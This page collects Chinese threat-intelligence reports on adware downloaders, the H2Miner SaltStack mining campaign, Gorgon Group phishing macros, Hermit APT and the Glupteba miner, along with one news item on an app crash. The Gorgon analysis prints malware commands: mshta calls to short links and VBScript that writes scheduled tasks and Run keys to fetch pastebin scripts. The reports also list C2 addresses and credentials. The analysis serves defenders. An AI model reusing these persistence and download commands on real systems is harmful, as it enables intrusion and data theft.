分类: 今日推送

DT 下载器木马感染 2 万台电脑,中招后频繁弹广告、主页被锁

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/afn9jkgaDqX2wIoHk4G6JQ 一、概述 腾讯安全威胁情报中心在进行例行高广风险文件排查时,发现一个名为DTCenSvc.exe的文件异常之高,腾讯安全大数据显示已有超2万台电脑中招。经分析该文件运行后会在用户机器内安装一系列的广告弹窗程序、主页篡改程序。 溯源后发现,该病毒运行过程中的部分文件、域名等基础设置与DT下载器家族恶意传播推广资源一致。软件供应链传播病毒国内时有发生,下载器问题尤显突出。腾讯安全专家提醒用户避免从易受污染的软件下载站下载,高风险下载渠道极易感染挖矿木马、勒索软件、广告弹窗、浏览器主页被锁等问题。 二、解决方案 互联网上充斥各种小众软件分发渠道,这些渠道或良莠不齐,或管理混乱,用户通过这些小众渠道搜索下载软件时,极易感染病毒木马,被捆绑安装不需要的其他软件。 腾讯安全专家建议网民尽可能通过相应软件的官方网站下载软件,或者使用安全软件提供的软件管理功能搜索下载相应软件。腾讯电脑管家及腾讯T-Sec终端安全管理系统已升级查杀DT下载器木马,内置的软件管理功能提供高速下载、自动去除插件安装、自动卸载恶意软件、管理软件的自动开机加载及广告弹出等特色功能。 三、病毒样本分析 DTCenSvc.exe运行后会释放执行yDwpSvc.exe模块,并将其设置为服务启动。yDwpSvc则通过地址hxxp://down.hao3603.com/rcsvccfg10.ini获取配置文件,并拉取配置中的文件执行。 目前配置中保存了两个RUL,分别为: hxxp://down.hao3603.com/qd/MiniSetup.exe链接内的MiniSetup安装包文件,hxxp://down.hao3603.com/qd/ObtainSysInfo.exe链接内的ObtainSysInfo包文件。 MiniSetup.exe包运行后会在系统内安装广告弹窗相关模块,包含一个Mini页弹窗,一个窗口右下角弹窗。但由于两个弹窗均无来源标识说明,部分用户也难以对其进行卸载删除,用户看到此类广告后会感到极度反感。 ObtainSysInfo.exe是一个主页修改相关的包程序,该程序运行后会首先检查环境内是否有安全软件相关进程,如果判断当前运行环境处于安全软件保护中。则不执行后续浏览器主页相关配置等修改逻辑。否则进一步通过从云端两次拉取加密包,解密解压缩后内存中执行DLL恶意代码。进而修改感染病毒机器内的主页,收藏等信息。 ObtainSysInfo.exe运行后会首先避开安全软件进程,安全软件进程字串使用循环异或1-5的方式动态解密后再使用 循环异或1-5后解密出如下安全软件进程 随后通过地址hxxp://down.1230578.com/UpdateProfile.7z拉取加密的包文件 通过在内存中对加密后的UpdateProfile.7z进行解密解压缩后得到名为SetVecfun.dll并执行其导出函数plugin_lock SetVecfun.Dll模块其plugin_lock内代码执行后会进一步再次拉取 hxxp://down.1230578.com/SetFunVec.7z地址内的加密包文件,解密解压后内存调用其内的浏览器修改相关接口函数。 再次Dump后可知该Dll提供了各浏览器的修改接口供调用者使用,主要通过修改注册表信息,修改浏览器配置信息,修改浏览器本地数据库信息等方式。进而达到对各浏览器的主页,收藏,启动快捷方式进行修改。 例如通过修改谷歌浏览器配置文件修改主页信息,通过注册表相关位置修改IE浏览器主页等。部分安全软件监控下的敏感位置在进行篡改操作时同样会通过进程进行环境判断从而达到避开安全软件提示的目的。 被劫持的浏览器主页地址信息会被同时保存在注册表以下位置内。 HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\llqm_* 同时还会进一步遍历TaskBar目录文件,来修改浏览器快捷方式,在其快捷方式后添加劫持参数,带到从快速启动栏启动浏览器时进入劫持主页地址 同时进一步修改了浏览器收藏文件夹信息,将大量的电商,算命等广告内容植入浏览器收藏夹内。 例如下入中浏览器主页,收藏信息已被篡改 四、病毒溯源分析 经过溯源分析,我们找到了一个同样会传播病毒相关模块的某款下载器的早期版本,该早期版本下载器同样会释放名为DTPageSet.Exe的模块执行。 比对可知,本次传播的病毒ObtainSysInfo.exe模块同下载器释放的DTPageSet.Exe拥有基本一致的代码内容,且本地病毒使用的hxxp://down.1230578.com/SetFunVec.7z恶意代码投递地址与下载器hxxp://down.1230578.com/DTPageSet.exe域名一致。 该下载器同样存在恶意修改浏览器主页信息,静默推装多款应用的行为,会在用户电脑静默安装病毒文件和推广安装用户不需要的多个软件。 附录 IOCs MD5: aa8c5fffd2de7bd7c39f90a9392d8db0 7348a00072d3d45e6006d7945744d962 fbb1a7653d715b8f56e54917adb2450e b6efb80f8c28a9c95fa3353d534c13d8 b1766aad514d1d84d3ed360c35d88f78 Domain: down.hao3603.com down.1230578.com URL: hxxp://down.hao3603.com/qd/MiniSetup.exe hxxp://down.hao3603.com/qd/ObtainSysInfo.exe hxxp://down.1230578.com/SetFunVec.7z hxxp://down.1230578.com/UpdateProfile.7z hxxp://down.1230578.com/DTPageSet.exe

H2Miner 黑产团伙利用 SaltStack 漏洞控制服务器挖矿,已获利 370 万元

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q 一、概述 腾讯安全威胁情报中心于2020年05月03日检测到H2Miner木马利用SaltStack远程命令执行漏洞(CVE-2020-11651、CVE-2020-11652)入侵企业主机进行挖矿。通过对木马的核心脚本以及可执行文件的对比分析,我们确认了此次攻击行动属于挖矿木马家族H2Miner。 H2Miner是一个linux下的挖矿僵尸网络,通过hadoop yarn未授权、docker未授权、confluence RCE、thinkphp 5 RCE、Redis未授权等多种手段进行入侵,下载恶意脚本及恶意程序进行挖矿牟利,横向扫描扩大攻击面并维持C&C通信。 腾讯安全威胁情报中心大数据统计结果显示,H2Miner利用SaltStack漏洞的攻击自5月3日开始,目前呈快速增长趋势。H2Miner挖矿木马运行时会尝试卸载服务器的安全软件,清除服务器安装的其他挖矿木马,以独占服务器资源。目前,H2Miner黑产团伙通过控制服务器进行门罗币挖矿已非法获利超370万元。 二、样本分析 Saltstack是基于python开发的一套C/S自动化运维工具。近日,SaltStack被爆存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652),其中: CVE-2020-11651:为认证绕过漏洞,攻击者可构造恶意请求,绕过Salt Master的验证逻辑,调用相关未授权函数功能,达到远程命令执行目的。 CVE-2020-11652:为目录遍历漏洞,攻击者可构造恶意请求,读取服务器上任意文件,获取系统敏感信息信息。 漏洞影响版本 SaltStack < 2019.2.4 SaltStack < 3000.2 安全研究人员在得到企业授权后,对中招机器进行排查,在/var/log/salt/minion日志中发现攻击时的恶意文件下载行为: 该下载行为正是利用SaltStack漏洞攻击成功后执行的远程命令,命令通过curl或wget下载和执行脚本sa.sh(http[:]//217.12.210.192/sa.sh),脚本sa.sh具有以下功能: 1、卸载防御软件阿里云骑士、腾讯云镜。 2、通过端口、文件名、进程名、钱包地址匹配匹配找到竞品挖矿木马,删除对应的进程和文件,杀死正在运行的竞争对手的Docker容器并删除其镜像。 3、检查文件/tmp/salt-store是否存在,md5是否为“8ec3385e20d6d9a88bc95831783beaeb”。 4、salt-store不存在或md5不正确则下载该文件至tmp目录下。 下载得到的salt-store采用Golang编写,被编译为Linux平台可执行程序,主要有以下功能: 下载文件并执行 启动和维持挖矿程序 与C&C服务器通信,接收并执行远程命令 利用masscan对外扫描 针对redis服务进行爆破攻击 salt-store从http[:]//206.189.92.32/tmp/v下载XMRig挖矿木马,保存为/tmp/salt-minions,然后启动连接矿池xmr-eu1.nanopool.org挖矿,配置中使用门罗币钱包为: 46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb 目前该钱包已挖矿获得8236个门罗币,获利折合人民币超过370万元。该黑产团伙的战果显示:入侵控制Linux服务器挖矿已是黑产生财之道,采用Linux服务器的企业万不可掉以轻心。 三、关联家族分析 此次攻击中sa.sh(e600632da9a710bba3c53c1dfdd7bac1)与h2miner使用的 ex.sh(a626c7274f51c55fdff1f398bb10bad5)脚本内容呈现高度相似: 上述标记中sa.sh对比ex.sh唯一缺少的代码是通过crontab定时任务设置持久化。 而sa.sh和ex.sh主要的任务为下载木马salt-store(8ec3385e20d6d9a88bc95831783beaeb)和kinsing(a71ad3167f9402d8c5388910862b16ae),这两个木马都时采样Golang语言编写,并编译为Linux平台可执行程序,两个样本代码结构高度相似、并且完成的功能几乎相同,因此我们认为两者属于同一家族。 四、安全建议 腾讯安全专家建议企业采取以下措施强化服务器安全,检查并清除服务器是否被入侵安装H2Miner挖矿木马。 1.将Salt Master默认监听端口(默认4505 和 4506)设置为禁止对公网开放,或仅对可信对象开放。将SaltStack升级至安全版本以上,升级前建议做好快照备份,设置SaltStack为自动更新,及时获取相应补丁。 2.Redis 非必要情况不要暴露在公网,使用足够强壮的Redis口令。 3.参考以下步骤手动检查并清除H2Miner挖矿木马: kill掉进程中包含salt-minions和salt-store文件的进程,文件hash为a28ded80d7ab5c69d6ccde4602eef861、8ec3385e20d6d9a88bc95831783beaeb; 删除文件/tmp/salt-minions、/tmp/salt-store; 将恶意脚本服务器地址217.12.210.192、206.189.92.32进行封禁; 升级SaltStack到2019.2.4或3000.2,防止病毒再次入侵。 IOCs MD5 e600632da9a710bba3c53c1dfdd7bac1 a28ded80d7ab5c69d6ccde4602eef861 8ec3385e20d6d9a88bc95831783beaeb a626c7274f51c55fdff1f398bb10bad5 a71ad3167f9402d8c5388910862b16ae IP 217.12.210.192 206.189.92.32 144.217.117.146 URL hxxps[:]//bitbucket.org/samk12dd/git/raw/master/salt-store hxxp[:]//217.12.210.192/salt-store hxxp[:]//217.12.210.192/sa.sh hxxp[:]//206.189.92.32/tmp/v hxxp[:]//206.189.92.32/tmp/salt-store hxxp[:]//144.217.117.146/ex.sh hxxp[:]//144.217.117.146/kinsing2 参考链接 通告:针对SaltStack远程命令执行漏洞(CVE-2020-11651、CVE-2020-11652)植入挖矿木马的应急响应 https://mp.weixin.qq.com/s/CtZbXD0CXCemWyAwWhiv2A https://developer.aliyun.com/article/741844

Facebook SDK 问题导致部分 iOS 应用崩溃 Spotify、TikTok 均受影响

当地时间今天下午,多个iPhone和iPad用户发现他们设备上的iOS应用在运行时出现了崩溃的现象,而这个问题似乎是由应用所使用的Facebook SDK的故障造成的。在一些苹果设备论坛上有多个关于iOS设备上的应用不断出现崩溃的投诉,各种应用似乎都受到了影响,专门用于监测网络服务健康程度的Downdetector仪表盘上更是出现了罕见的全员故障情景。 例如,谷歌的Waze应用无法启动,还有包括Pinterest、Spotify、Adobe Spark、Quora、TikTok等在内的各种常用应用的问题报告。 GitHub上的多个开发者将问题归咎于Facebook的软件开发工具包,这一功能通常被用于签到和登录,更奇怪的是,即使用户没有使用包含的Facebook登录选项的功能,仅仅需要应用程序使用过Facebook SDK,就有机会导致App无法打开的情形。 目前还不清楚这个问题何时能修复,但由于有这么多应用受到影响,可能很快就会得到重视和解决,Facebook很可能会通过服务器更新迅速修复这个问题。   (稿源:cnBeta,封面源自网络。)

收到“订单、付款收据、分析报告”PPT,请勿打开,为Gorgon Group黑客组织投递的攻击邮件

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Td6zdGxeOjKEh3nu-vAGdw 一、背景 近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码,宏代码会启动mshta执行保存在pastebin上的远程脚本代码,且pastebin URL是由Bitly生成的短链接。 此次攻击的主要特点为恶意代码保存在托管平台pastebin上:包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马,然后将其注入指定进程执行,RAT会不定期更换,当前获取的RAT 木马是Azorult窃密木马。 对比分析发现,攻击者注册的pastebin账号为”lunlayloo”( 创建于2019年10月),与另一个账号“hagga”(创建于2018年12月)对应攻击事件中使用的TTP高度相似,因此我们认为两者属于同一家族ManaBotnet,并且”lunlayloo”可能为“hagga”的后继者。 有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group,一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击,包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。 Manabotnet攻击流程 二、详细分析 初始攻击以PPT文档为诱饵,使用的文件名有“SHN FOODS ORDER.ppt”、“PrivateConfidential.ppt”、“Analysis Reports.ppt”、“Order001.ppt”、“payment_receipt.ppt”,邮件主题为Analysis Reports From IDS Group(来自IDS Group的分析报告 )、Analysis Reports From NHL – Nam Hoang Long Co.,Ltd(来自NHL公司的分析报告)、Purchase Order2020(2020采购订单)、payment_receipt.ppt(付款收据)等。 Analysis Reports.ppt中包含恶意的VBA宏代码。 如果用户选择启用宏,则会执行命令: `mshta https[:]//j.mp/ghostis61hazsba` 远程代码URL是短链接,还原为https[:]//pastebin.com/raw/FssQ8e8e,恶意代码被保存在托管平台pastebin.com。 以同样方式投递的文档SHN FOODS ORDER.ppt中的宏执行的恶意代码为,https[:]//j.mp/ghjbnzmxc767zxg,短链接还原得到https[:]//pastebin.com/raw/RCd2CLNd,该地址的托管恶意代码页面如下: 通过浏览器的调试功能对该代码进行编码转换可得到VBScript代码: 该代码加入了一些字符反转和字符连接操作,以逃避恶意代码检测,然后执行5个操作进行持久化: 1.创建计划任务“Murtaba”,每80分钟运行一次远程hta脚本; 2.执行一次hta脚本; 3.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2下写入执行hta脚本的命令; 4.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3下写入执行hta脚本的命令; 5.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\中写入执行hta脚本的命令。 `CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn ““Murtaba”” /tr ““\”“&` `CreateObject(“WScript.Shell”).Run “””mshta”””“http:\\pastebin.com\raw\B7f3BpDk”“”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\eMse7spS”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\hxKddkar”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\”, ““”m” + “s” + “h” + “t” + “a“”””http:\\pastebin.com\raw\v2US1QAY”””, “REG_SZ”` 在计划任务中指定执行的远程hta脚本均https[:]\\pastebin.com\raw\B7f3BpDk,解码为以下文本,同样是一段VBScript代码,在其中以隐藏的方式执行Powershell,首先通过ping google.com测试网络是否连通,然后下载Powershell脚本https[:]//pastebin.com/raw/8ZebE1MG进行base64解码并执行。 计划任务执行的Pastebin保存的VBScript脚本: VBScript通过Powershell执行Pastebin保存的以base64编码的Powershell脚本: Base64解码后: Powershell代码将一个压缩包文件的二进制数据以硬编码形式进行保存,使用时首先将“!”替换为“0x”去除混淆,然后通过IO.MemoryStream将数据读取到内存,最后再使用IO.Compression.GzipStream进行解压,就可以获得一个以.Net编写的DLL并通过Reflection  加载执行: $t=[System.Reflection.Assembly]::Load($decompressedByteArray); Powershell获取的另一个PE直接保存了二进制编码在pastebin的URL(https://pastebin.com/raw/f9c50ewQ)上,使用时首先将‘T_B’替换为‘0x’,在分析过程中发URL被动态更换为了:https://pastebin.com/raw/EmyvkN6m,使用时将“^^_^^”替换为“0x”,还原得到PE文件后,将其注入到notepad.exe的内存中执行: [Givara]::FreeDom(‘notepad.exe’,$Cli2)  https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m .NET编写的DLL名为Apple.dll,入口调用Fuck.FUN,Fuck.FUN随后启动记事本,掏空现有部分的映射,在记事本进程中分配一个新的缓冲区,向该进程中写入有效负载,然后继续执行线程。这样使得攻击者无需将恶意软件写入磁盘,通过计划任务可定期获取注射器(一段攻击代码,用来将RAT注入其他程序)和RAT,并将RAT注入指定进程的内存中执行。 当前作为Payload被下载执行的是Azorult木马,一种使用Delphi编写的窃密木马变种。Azorult已在俄罗斯论坛上出售,价格最高为100美元。 Azorult窃密木马的大多数功能是获取可以在受害者计算机上找到的各类账号密码,例如,电子邮件帐户,通信软件(例如pidgin、 psi+,、telegram),Web Cookie,浏览器历史记录和加密货币钱包,同时该木马还具有上载和下载文件以及截屏的功能。 三、团伙分析 攻击者使用第三方网站(例如Bitly,Blogspot和Pastebin)可能是为了逃避检测,因为这些网站不会被网络防御方判断为恶意网站。但是,诸如Bitly和Pastebin之类的网站会记录访问某个链接的次数。我们能够确定是谁创建了此Pastebin帖子,并统计该链接被访问了多少次。 例如,从页面可以看到托管“Apple.dll”样本的URL已被查看12000多次。这表明有12000台计算机受此攻击影响。但是,由于攻击者使用的是已知的RAT木马,因此实际受影响的计算机数量可能会少得多,因为许多计算机可能已安装了杀毒软件。 “lunlayloo”在2020年3月30日上传的恶意代码,该账户创建于2019年10月23日。 lunlayloo在2020年4月21日上传的恶意代码,托管“Azorult Rat”,由于最近才更新,被查看只有77次。 分析时发现攻击Azorult Rat回传数据对应的URL为: http[:]//23.247.102.120/manabotnet-work/index.php 该URL中包含的“manabotnet”与另一安全公司发现的Pastebin帖子标题:“ MasterManabots-all-bots”相同,该攻击者的Pastebin账号名称为“hagga”,于2018年12月3日创建,另外由于两次攻击使用的TTP高度相似性,所以我们认为他们属于同一家族ManaBots。   unit42在2019年4月对Pastebin账号“HAGGA”发起的攻击活动进行了详细的分析,基于高水平的TTP,包括使用RevengeRAT,unit42认为其与Gorgon Group组织有关。 (https[:]//unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/) 2019年1月腾讯安全御见威胁情报中心也捕获到疑似来自Gorgon Group组织相关的攻击,)(https[:]//www.freebuf.com/column/193603.html),该攻击以“订单”、“支付详单”等主题的钓鱼邮件针对全球的外贸人士进行攻击,行为类似于腾讯安全威胁情报中心多次披露的”商贸信”,攻击者使用blogspot的订阅功能来保存恶意代码。 综合分析以上几次攻击行动,总结该团伙攻击对应的ATT&CK矩阵对应如下,共涉及约44个TTP技术: Initial Access(初始攻击) T1193 Spearphishing Attachment Execution(执行) T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1064 Scripting T1127 Trusted Developer Utilities Persistence(持久化) T1060 Registry Run Keys / Startup Folder T1053 Scheduled Task Privilege Escalation(权限提升) T1055 Process Injection T1053 Scheduled Task Defense Evasion(防御逃逸) T1140 Deobfuscate/Decode Files or Information T1143 Hidden Window T1170 Mshta T1027 Obfuscated Files or Information T1093 Process Hollowing T1055 Process Injection T1064 Scripting T1127 Trusted Developer Utilities T1102 Web Service Credential Access(凭证获取) T1503 Credentials from Web Browsers T1081 Credentials in Files T1214 Credentials in Registry T1539 Steal Web Session Cookie Discovery(数据发现) T1083 File and Directory Discovery T1012 Query Registry T1518 Software Discovery T1082 System Information Discovery T1007 System Service Discovery Collection(数据采集) T1123 Audio Capture T1119 Automated Collection T1115 Clipboard Data T1213 Data from Information Repositories T1005 Data from Local System T1039 Data from Network Shared Drive T1074 Data Staged T1056 Input Capture T1185 Man in the Browser T1113 Screen Capture T1125 Video Capture Command and Control(命令和控制) T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1132 Data Encoding T1001 Data Obfuscation T1219 Remote Access Tools T1105 Remote File Copy T1102 Web Service Exfiltration(数据窃取) T1022 Data Encrypted T1041 Exfiltration Over Command and Control Channel 其中具有该团伙的代表性的TTP技术点为: T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder T1093 Process Hollowing T1055 Process Injection T1102 Web Service 在T1102 Web Service技术上,该团伙经常使用的合法外部Web服务为Bitly、Blogspot和Pastebin,这个技术在ATT&CK矩阵中战术条目中同时属于Defense Evasion(防御逃逸)和Command and Control(命令和控制),在具体攻击过程中体现在可以绕过恶意网址检测,以及可以通过修改托管网站上的URL对应的内容动态控制下载的恶意代码。 四、安全建议 Gorgon Group为专业黑客组织,擅长攻击大型企业、行业及政府背景的机构,腾讯安全威胁情报中心推荐相关单位采用腾讯安全完整解决方案提升系统安全性,防止专业黑客的攻击。 IOCs Md5 417eef85b7545b13cb2a5b09508a9b8a cd425ac433c6fa5b79eecbdd385740ab f4479c5553271402ab4ff9a55584a9fd URL http://23.247.102.120/manabotnet-work/index.php 短链接: https[:]//j.mp/ghjbnzmxc767zxg https[:]//j.mp/hdjas6782vnavx https[:]//j.mp/dhajsk67a8sdg https[:]//j.mp/ahjkads78dasa https[:]//j.mp/hdajks6786sa https[:]//j.mp/dbashgdyt23vb Pastebin https[:]//pastebin.com/raw/8ZebE1MG https[:]//pastebin.com/raw/FssQ8e8e https[:]//pastebin.com/raw/RCd2CLNd https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m https[:]//pastebin.com/raw/B7f3BpDk https[:]//pastebin.com/raw/eMse7spS https[:]//pastebin.com/raw/hxKddkar https[:]//pastebin.com/raw/v2US1QAY 参考链接 https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ https://www.freebuf.com/column/193603.html

Hermit(隐士)APT 组织 2020 年最新攻击活动分析

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Gukd2lNr9lE8fluG4bFfSw 一、概述 两年前,腾讯安全威胁情报中心曝光了SYSCON/SANNY木马的活动情况,并且根据关联分析确定跟KONNI为同一组织所为。该组织的攻击对象包括与朝鲜半岛相关的非政府组织、政府部门、贸易公司、新闻媒体等。 SYSCON/SANNY木马是一个非常有特色的远程控制木马,通过ftp协议来进行C&C控制,该后门的主要攻击目标为朝鲜半岛相关的重要政治人物或者要害部门,偶尔也会针对东南亚等国进行攻击。该活动自2017年下半年开始活跃,并且对多个目标进行了攻击活动。被曝光后,该组织活动没有任何减弱的迹象。腾讯安全威胁情报中心根据该组织的特点,在2018年12月将其命名为“Hermit(隐士)”。 2020年,“Hermit(隐士)”APT组织依然保持较高的活跃度,攻击方式和木马行为上也有了较大的更新,因此我们对近期的攻击活动做一个整理,并对木马的一些更新情况做一个详细分析汇总。 二、诱饵 使用带有恶意Office宏代码的攻击诱饵依然是SYSCON/SANNY最常用的攻击方式,此外通过修改字体颜色来伪装宏代码的恶意行为也是该组织的特点之一,该特点一直保持至今。而诱饵的主题依然是紧贴时事热点,尤其是全球新冠疫情(COVID-19)热点以及朝鲜半岛相关的局部热点事件。 例如3月份“Hermit(隐士)”组织使用“口罩仅建议用于照顾COVID-19病人的人使用”的文档标题作为攻击诱饵。 “Hermit(隐士)”使用新冠疫情(COVID-19)口罩话题为诱饵 “Hermit(隐士)”组织使用2020年东京残奥会捐助相关的诱饵  “Hermit(隐士)”组织伪装成2020年朝鲜政策相关话题为诱饵  “Hermit(隐士)”组织使用朝鲜Covid-19疫情相关主题为诱饵 三、恶意宏代码分析 携带恶意宏代码的恶意Office文件几乎是该组织的唯一攻击方式,多数诱饵会在未启用宏的情况下在诱饵文件中显示诱导内容,诱导用户启用宏,在未启用宏的情况下字体为几乎无法查看的灰色。 诱导受害者启用恶意宏代码查看文档 多数诱饵的vba宏代码使用密码保护 宏代码中会调整图片大小以及修改字体颜色,用来隐藏真实的恶意行为 最新的攻击宏代码主要恶意行为是释放一个PE文件,并创建进程执行,执行时会将配置的CC信息作为命令行参数传递给恶意进程。 释放PE文件相关宏代码之一 释放PE文件相关宏代码之二 四、downloader&install过程分析 释放出的PE文件是一个downloader木马,其主要功能是从命令行参数中提取URL,并进行一系列的下载、解压和安装行为,以下以最新版本的文件up.exe(a83ca91c55e7af71ac4f712610646fca)作为样本进行详细分析。 up.exe行为 1)首先从参数中取出URL,然后判断操作系统是32位还是64位,如果32位则下载2.dat、64位下载3.dat下载完成后将其解密成temp.cab,随后执行expand命令对cab进行解压释放 downloader主要功能函数 2)cab内容如下,主要包含一个安装bat文件、一个RAT dll文件、一个ini文件 cab压缩包内容 3)检查当前进程权限,不同权限不同处理方式 进程权限检测相关代码 4)如果不是TokenElevationTypeLimited权限,即管理员用于以非管理员权限运行程序,则直接winexec执行install.bat,如果是TokenElevationTypeLimited则判断cmd.exe的版本,根据版本不同执行不同的UAC bypass策略,共内置了三种绕过UAC的方式。 根据cmd版本信息使用不同的UAC bypass方案 5)UAC bypass方式一相关代码 UAC bypass方式一 6)UACbypass方式二相关代码 UAC bypass方式二 7)UAC bypass方式三相关代码 UAC bypass方式三 8)install.bat的功能就是将wprint.dll和wprint.ini复制到system32目录,并创建服务持久化dll install.bat 五、RAT行为详细分析 1,首先判断目录下是否有dll同名的dat文件,如果有则读取并解密出配置信息,如果没有则读取同名的ini文件,即wprint.ini并解密,解密得到URL后进行不断尝试下载dat 解密ini获取url下载dat相关代码 2、wprint.ini解密结果如下:是一个url,使用URLDownloadToFile进行下载后存为wprint.dat 解密后的ini内容 3)读取wprint.dat并解密,得到包括ftpserver、username、password在内的配置信息 从dat从提取配置信息相关代码 4)根据配置信息连接ftpserver,并将server上的htdocs设置为当前目录,在其中创建一个以本地computername加密后的字符串为名称的新目录 连接ftpserver、创建目录相关代码 5)先后执行cmd /c systeminfo > temp.ini、cmd /c tasklist > temp.ini两个命令收集计算机信息和进程列表,加密上传temp.ini文件到ftpserver并以ff mm-dd hh-mm-ss.txt的时间格式命名。 执行命令获取信息相关代码 6)ftp上传文件相关代码,除了.cab、.zip、.rar外的其他扩展名文件均会被压缩成.cab后加密上传 上传信息、文件相关代码 7)依次下载ftpserver上的cc(x)文件到本地解析指令进行命令分发,x为从0开始依次自增的整数 获取控制指令相关代码 获取控制指令相关代码 8)命令文件格式为开头“#”字符与第二个“#”之间的为下发的文件内容,第二个“#”之后的为指令内容 解析控制文件cc相关代码 9)控制指令列表如下:主要完成cmdshell和文件上传下载执行的功能 10)cmd /c指令相关处理代码如下 cmd命令相关代码 11)/user指令相关处理代码如下 user命令相关代码 12)其他指令处理代码如下 其他命令相关处理代码 六、版本变化 SYSCON/SANNY的活动最早可追溯到2017年,使用ftp协议作为RAT控制协议的木马是该组织最早使用也是最长使用的手法,与之前版本的木马相比,近期攻击所使用的木马有以下升级点: 七、安全建议 腾讯安全威胁情报中心建议我国政府机关、重要企业、科研单位对APT攻击保持高度警惕,可参考以下建议提升信息系统的安全性: 1、建议重要机构网管培训工作人员不要随意打开不明来源的邮件附件,在邮件目的及发件人均未知的情况下,建议不要访问附件。 2、建议企业用户使用腾讯T-Sec终端安全管理系统修补漏洞,及时安装系统补丁,可减少被漏洞攻击的风险。同时注意打开Office文档时,避免启用宏代码。 3、推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客攻击行为进行检测。 八、附录 IOCs HASH: guidance.doc: 677e200c602b44dc0a6cc5f685f78413 123.doc: 40e7a1f37950277b115d5944b53eaf3c Keep an eye on North Korean cyber.doc: 1a7232ef1386f78e76052827d8f703ae Kinzler Foundation for 2020 Tokyo Paralympic games.doc: faf6492129eeca2633a68c9b8c2b8156 ce26d4e20d936ebdad92f29f03dfc1d9 7e71d5a0f1899212cea498bbda476ce8 a83ca91c55e7af71ac4f712610646fca 77f46253fd4ce7176df5db8f71585368 62e959528ae9280f39d49ba5c559d8fb C2: phpview.mygamesonline.org firefox-plug.c1.biz win10-ms.c1.biz ftpserver:myview-202001.c1.biz username:3207035 password:1qazXSW@3edc 参考链接 https://mp.weixin.qq.com/s/rh4DoswLUNkS8uiHjrFU9A https://mp.weixin.qq.com/s/CBh2f-lfG5H4wcoj5VSfEw https://mp.weixin.qq.com/s/F2-DLtuHUkV_nCnKwp44_Q

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ   一、概述 腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2。 cloudnet.exe原来是Glupteba恶意木马,Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现,2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。 当前NSAGluptebaMiner版本具有以下特征: 利用永恒之蓝漏洞攻击传播; 安装计划任务实现持久化,任务利用certutil.exe下载木马; 利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传; 绕过UAC,以管理员权限和系统权限运行,将木马程序加入防火墙策略白名单、Windows Defender查杀白名单; 安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护; 运行门罗币挖矿程序wup.exe; 利用组件cloudnet.exe构建僵尸网络; 连接远程服务器,接收指令完成远控操作; 通过比特币交易数据更新C2地址。 二、详细分析 漏洞攻击成功后,Payload首先下载app.exe在内存中执行PE文件,并且将该文件释放到C:\Windows\rss\csrss.exe,csrss.exe是一个木马下载器,采用Go编程语言编写。 下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户,以及一些以二进制形式硬编码的信息来初始化“配置信息”,然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>(8位随机字符)来存储所有获取的信息。(之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp) 首先会检测是否在虚拟机中执行。 然后判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。 